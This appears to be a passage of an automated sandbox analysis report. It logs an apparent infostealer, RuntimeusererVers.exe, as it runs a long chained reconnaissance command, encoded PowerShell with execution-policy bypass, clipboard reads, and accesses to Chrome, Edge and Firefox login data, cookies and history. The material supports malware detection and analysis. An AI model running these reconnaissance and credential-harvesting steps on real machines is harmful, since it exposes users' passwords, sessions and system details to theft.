                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                      Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe; Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [Base64-encoded command omitted]
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [Base64-encoded command omitted]
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe; Queries volume information (VolumeInformation) for:
                        C:\Users\user\Desktop
                        C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942
                        C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pyd
                        C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict
                        C:\Users\user\Desktop\RuntimeusererVers.exe
                        C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                        C:\Users\user\AppData\Local\Google\Chrome\User Data
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\025af778-db9d-49f0-b172-4eb563717cb5
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded
                        C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\de
                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\en-GB
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\bookmarkbackups VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes\events VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\events VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
